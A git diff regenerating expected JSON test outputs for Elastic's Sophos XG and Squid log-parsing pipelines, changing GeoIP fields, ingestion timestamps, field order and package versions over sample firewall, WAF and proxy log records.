sha1sum=\"83cd339302bf5e8ed5240ca6383418089c337a81\" source=\"jsmith@iview.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", "code": "138302218042", "kind": "alert", @@ -8237,12 +7922,6 @@ } }, { - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "C44313350024-P29PUA", @@ -8261,6 +7940,9 @@ "defaulttest.local" ] }, + "log": { + "level": "informational" + }, "sophos": { "xg": { "reason": "eligible", @@ -8278,7 +7960,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715648800Z", + "ingested": "2021-12-14T14:54:45.179864371Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=136501618041 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Allowed\" priority=Information user_name=\"\" src_ip= filename=\"\" filetype=\"\" filesize=0 sha1sum=\"\" source=\"\" reason=\"eligible\" destination=\"\" subject=\"\"", "code": "136501618041", "kind": "event", @@ -8292,7 +7974,10 @@ "connection" ], "outcome": "success" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -8360,7 +8045,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715729400Z", + "ingested": "2021-12-14T14:54:45.179864832Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136528618043 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Pending\" priority=Information user_name=\"jsmith\" src_ip=10.198.47.112 filename=\"19.exe\" filetype=\"application/octet-stream\" filesize=153010 sha1sum=\"3ce799580908df9ca0dc649aa8c2d06ab267e8c8\" source=\"10.198.241.50\" reason=\"pending\" destination=\"\" subject=\"\"", "code": "136528618043", "kind": "event", @@ -8441,7 +8126,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715736400Z", + "ingested": "2021-12-14T14:54:45.179865205Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"jsmith\" src_ip=10.198.47.112 filename=\"19.exe\" filetype=\"application/octet-stream\" filesize=153010 sha1sum=\"3ce799580908df9ca0dc649aa8c2d06ab267e8c8\" source=\"10.198.241.50\" reason=\"cloud malicious\" destination=\"\" subject=\"", "code": "136502218042", "kind": "alert", @@ -8517,7 +8202,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715742800Z", + "ingested": "2021-12-14T14:54:45.179865579Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"\" src_ip=175.16.199.1 filename=\"SBTestFile1.pdf\" filetype=\"application/pdf\" filesize=1124 sha1sum=\"d910c4a81122c360fe57f67a04999425a65249db\" source=\"sophostest.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", "code": "136502218042", "kind": "alert", @@ -8544,19 +8229,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 401, @@ -8565,19 +8245,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 1419, @@ -8638,7 +8313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715749Z", + "ingested": "2021-12-14T14:54:45.179865958Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" extra=\"-\" contenttype=\"-\" useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=175.16.199.1 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79", "code": "075000617071", "kind": "alert", @@ -8667,19 +8342,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 200, @@ -8688,19 +8358,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 1774, @@ -8762,7 +8427,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715753100Z", + "ingested": "2021-12-14T14:54:45.179866350Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST httpstatus=200 reason=\"-\" extra=\"-\" contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=175.16.199.1 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79", "code": "075000617071", "kind": "alert", @@ -8859,7 +8524,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715757900Z", + "ingested": "2021-12-14T14:54:45.179866792Z", "original": "device=\"SFW\" date=2020-05-19 time=17:20:29 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"jsmith\" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol=\"HTTP/1.1\" url=/ querystring= cookie=\"-\" referer=- method=GET httpstatus=403 reason=\"Static URL Hardening\" extra=\"No signature found\" contenttype=\"text/html\" useragent=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0\" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3", "code": "075000617071", "kind": "alert", @@ -8959,7 +8624,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715763800Z", + "ingested": "2021-12-14T14:54:45.179867168Z", "original": "device=\"SFW\" date=2020-05-19 time=18:03:30 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"jsmith\" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol=\"HTTP/1.1\" url=/download/eicarcom2.zip querystring= cookie=\"; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*\" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason=\"Antivirus\" extra=\"EICAR-AV-Test\" contenttype=\"text/html\" useragent=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0\" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6", "code": "075000617071", "kind": "alert", @@ -8989,19 +8654,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 403, @@ -9010,19 +8670,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 295, @@ -9083,7 +8738,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715769700Z", + "ingested": "2021-12-14T14:54:45.179867591Z", "original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=175.16.199.1 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3", "code": "075000617071", "kind": "alert", @@ -9137,7 +8792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715775600Z", + "ingested": "2021-12-14T14:54:45.179867971Z", "original": "device=\"SFW\" date=2017-02-01 time=14:17:35 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=106025618011 log_type=\"Wireless Protection\" log_component=\"Wireless Protection\" log_subtype=\"Information\" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_ssid=2", "code": "106025618011", "kind": "event", @@ -9185,7 +8840,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715780600Z", + "ingested": "2021-12-14T14:54:45.179868336Z", "original": "device=\"SFW\" date=2017-02-01 time=14:19:47 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=106025618011 log_type=\"Wireless Protection\" log_component=\"Wireless Protection\" log_subtype=\"Information\" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_ssid=3", "code": "106025618011", "kind": "event", diff --git a/packages/sophos/manifest.yml b/packages/sophos/manifest.yml index fe077a08a6c..778efe6f3e5 100644 --- a/packages/sophos/manifest.yml +++ b/packages/sophos/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: sophos title: Sophos Logs -version: 1.1.1 +version: 1.1.2 description: Collect and parse logs from Sophos Products with Elastic Agent. categories: ["security"] release: ga diff --git a/packages/squid/changelog.yml b/packages/squid/changelog.yml index 19918bf137e..11824ceb333 100644 --- a/packages/squid/changelog.yml +++ b/packages/squid/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/squid/data_stream/log/_dev/test/pipeline/test-access1.log-expected.json b/packages/squid/data_stream/log/_dev/test/pipeline/test-access1.log-expected.json index 40588223329..45dd04f5194 100644 --- a/packages/squid/data_stream/log/_dev/test/pipeline/test-access1.log-expected.json +++ b/packages/squid/data_stream/log/_dev/test/pipeline/test-access1.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "1157689312.049 5006 10.105.21.199 TCP_MISS/200 19763 CONNECT login.yahoo.com:443 badeyek DIRECT/209.73.177.115 -", "event": { - "ingested": "2021-06-08T12:14:41.661956500Z" + "ingested": "2021-12-14T14:55:08.315628175Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689320.327 2864 10.105.21.199 TCP_MISS/200 10182 GET http://www.goonernews.com/ badeyek DIRECT/207.58.145.61 text/html", "event": { - "ingested": "2021-06-08T12:14:41.661977800Z" + "ingested": "2021-12-14T14:55:08.315630625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689320.343 1357 10.105.21.199 TCP_REFRESH_HIT/304 214 GET http://www.goonernews.com/styles.css badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.661984700Z" + "ingested": "2021-12-14T14:55:08.315631050Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689321.315 1 10.105.21.199 TCP_HIT/200 1464 GET http://www.goonernews.com/styles.css badeyek NONE/- text/css", "event": { - "ingested": "2021-06-08T12:14:41.661990800Z" + "ingested": "2021-12-14T14:55:08.315631410Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689322.780 1464 10.105.21.199 TCP_HIT/200 5626 GET http://www.google-analytics.com/urchin.js badeyek NONE/- text/javascript", "event": { - "ingested": "2021-06-08T12:14:41.662034800Z" + "ingested": "2021-12-14T14:55:08.315631819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689323.718 3856 10.105.21.199 TCP_MISS/200 30169 GET http://www.goonernews.com/ badeyek DIRECT/207.58.145.61 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662041800Z" + "ingested": "2021-12-14T14:55:08.315632162Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689324.156 1372 10.105.21.199 TCP_MISS/200 399 GET http://www.google-analytics.com/__utm.gif? badeyek DIRECT/66.102.9.147 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662047400Z" + "ingested": "2021-12-14T14:55:08.315632507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689324.266 1457 10.105.21.199 TCP_REFRESH_HIT/304 215 GET http://www.goonernews.com/graphics/newslogo.gif badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662052400Z" + "ingested": "2021-12-14T14:55:08.315632877Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689324.281 1465 10.105.21.199 TCP_REFRESH_HIT/304 215 GET http://www.goonernews.com/shop/arsenal_shop_ad.jpg badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662056800Z" + "ingested": "2021-12-14T14:55:08.315633278Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689325.734 1452 10.105.21.199 TCP_REFRESH_HIT/304 214 GET http://www.goonernews.com/flags/FUS.gif badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662062100Z" + "ingested": "2021-12-14T14:55:08.315633607Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689325.736 2 10.105.21.199 TCP_HIT/200 1353 GET http://www.goonernews.com/flags/FGB.gif badeyek NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662078500Z" + "ingested": "2021-12-14T14:55:08.315633949Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689325.953 2603 10.105.21.199 TCP_MISS/200 1013 GET http://as.casalemedia.com/s? badeyek DIRECT/209.85.16.38 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662086500Z" + "ingested": "2021-12-14T14:55:08.315634813Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689326.703 4459 10.105.21.199 TCP_MISS/200 1845 CONNECT us.bc.yahoo.com:443 badeyek DIRECT/68.142.213.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662092200Z" + "ingested": "2021-12-14T14:55:08.315635154Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689327.312 1356 10.105.21.199 TCP_MISS/302 729 GET http://impgb.tradedoubler.com/imp/img/16349696/992098 badeyek DIRECT/217.212.240.172 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662097Z" + "ingested": "2021-12-14T14:55:08.315635496Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689327.751 3484 10.105.21.199 TCP_MISS/200 1577 GET http://4.adbrite.com/mb/text_group.php? badeyek DIRECT/206.169.136.22 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662102400Z" + "ingested": "2021-12-14T14:55:08.315635836Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689327.803 9 10.105.21.199 TCP_HIT/200 1353 GET http://www.goonernews.com/flags/FFR.gif badeyek NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662107100Z" + "ingested": "2021-12-14T14:55:08.315636166Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689329.234 1431 10.105.21.199 TCP_REFRESH_HIT/304 214 GET http://www.goonernews.com/flags/FAU.gif badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662118100Z" + "ingested": "2021-12-14T14:55:08.315636602Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689329.280 1414 10.105.21.199 TCP_REFRESH_HIT/304 213 GET http://www.goonernews.com/graphics/spacer.gif badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662122400Z" + "ingested": "2021-12-14T14:55:08.315636932Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689330.920 1686 10.105.21.199 TCP_MISS/200 1784 GET http://4.adbrite.com/mb/text_group.php? badeyek DIRECT/64.127.126.178 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662126600Z" + "ingested": "2021-12-14T14:55:08.315637260Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689331.313 3997 10.105.21.199 TCP_MISS/302 851 GET http://ff.connextra.com/Ladbrokes/selector/image? badeyek DIRECT/213.160.98.161 -", "event": { - "ingested": "2021-06-08T12:14:41.662131300Z" + "ingested": "2021-12-14T14:55:08.315637590Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689335.275 3962 10.105.21.199 TCP_MISS/200 30904 GET http://dd.connextra.com/servlet/controller? badeyek DIRECT/213.160.98.160 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662135800Z" + "ingested": "2021-12-14T14:55:08.315637914Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689337.481 4 10.105.47.218 TCP_DENIED/407 1661 GET http://hi5.com/ - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662140100Z" + "ingested": "2021-12-14T14:55:08.315638248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689342.757 3657 10.105.21.199 TCP_MISS/200 12569 CONNECT login.yahoo.com:443 badeyek DIRECT/209.73.177.115 -", "event": { - "ingested": "2021-06-08T12:14:41.662144200Z" + "ingested": "2021-12-14T14:55:08.315638584Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689343.106 1 10.105.33.214 TCP_DENIED/407 1752 GET http://update.messenger.yahoo.com/msgrcli7.html - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662148700Z" + "ingested": "2021-12-14T14:55:08.315639080Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689343.782 1371 10.105.33.214 TCP_MISS/200 484 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662153500Z" + "ingested": "2021-12-14T14:55:08.315639409Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689344.736 4969 10.105.47.218 TCP_MISS/200 29359 GET http://hi5.com/ nazsoau DIRECT/204.13.51.238 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662158Z" + "ingested": "2021-12-14T14:55:08.315639739Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689344.798 1631 10.105.47.218 TCP_MISS/200 5930 GET http://hi5.com/friend/styles/homepage.css nazsoau DIRECT/204.13.51.238 text/css", "event": { - "ingested": "2021-06-08T12:14:41.662162200Z" + "ingested": "2021-12-14T14:55:08.315640072Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689345.641 1810 10.105.33.214 TCP_MISS/200 1645 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662166900Z" + "ingested": "2021-12-14T14:55:08.315640407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689346.267 880 10.105.37.58 TCP_DENIED/407 1812 GET http://rms.adobe.com/read/0600/win_/ENU/read0600win_ENUadbe0000.xml - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662171100Z" + "ingested": "2021-12-14T14:55:08.315640735Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689347.190 10 10.105.47.218 TCP_IMS_HIT/304 217 GET http://images.hi5.com/styles/style.css nazsoau NONE/- text/css", "event": { - "ingested": "2021-06-08T12:14:41.662176200Z" + "ingested": "2021-12-14T14:55:08.315641085Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689347.307 116 10.105.47.218 TCP_IMS_HIT/304 217 GET http://images.hi5.com/friend/styles/buttons_en_us.css nazsoau NONE/- text/css", "event": { - "ingested": "2021-06-08T12:14:41.662212500Z" + "ingested": "2021-12-14T14:55:08.315641412Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689347.751 6160 10.105.47.218 TCP_MISS/200 27799 GET http://hi5.com/ nazsoau DIRECT/204.13.51.238 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662219100Z" + "ingested": "2021-12-14T14:55:08.315641750Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689349.064 1758 10.105.47.218 TCP_MISS/200 4470 GET http://hi5.com/friend/styles/headernav.css nazsoau DIRECT/204.13.51.238 text/css", "event": { - "ingested": "2021-06-08T12:14:41.662224300Z" + "ingested": "2021-12-14T14:55:08.315642097Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689350.829 1393 10.105.33.214 TCP_MISS/200 382 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662230200Z" + "ingested": "2021-12-14T14:55:08.315642434Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689353.439 3667 10.105.33.214 TCP_MISS/200 24095 GET http://insider.msg.yahoo.com/? adeolaegbedokun DIRECT/68.142.194.14 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662235100Z" + "ingested": "2021-12-14T14:55:08.315642872Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689353.939 4899 10.105.33.214 TCP_MISS/200 22964 GET http://radio.launch.yahoo.com/radio/play/playmessenger.asp adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662239500Z" + "ingested": "2021-12-14T14:55:08.315643207Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689354.877 1349 10.105.33.214 TCP_MISS/200 646 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662245700Z" + "ingested": "2021-12-14T14:55:08.315643543Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689355.517 1578 10.105.33.214 TCP_MISS/200 699 GET http://address.yahoo.com/yab/us? adeolaegbedokun DIRECT/209.191.93.51 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662249600Z" + "ingested": "2021-12-14T14:55:08.315643935Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689356.907 6741 10.105.21.199 TCP_MISS/302 734 GET http://fxfeeds.mozilla.org/rss20.xml badeyek DIRECT/63.245.209.21 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662253500Z" + "ingested": "2021-12-14T14:55:08.315644270Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689357.267 6424 10.105.33.214 TCP_MISS/200 31400 GET http://insider.msg.yahoo.com/ycontent/? adeolaegbedokun DIRECT/68.142.231.252 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662257700Z" + "ingested": "2021-12-14T14:55:08.315644668Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" 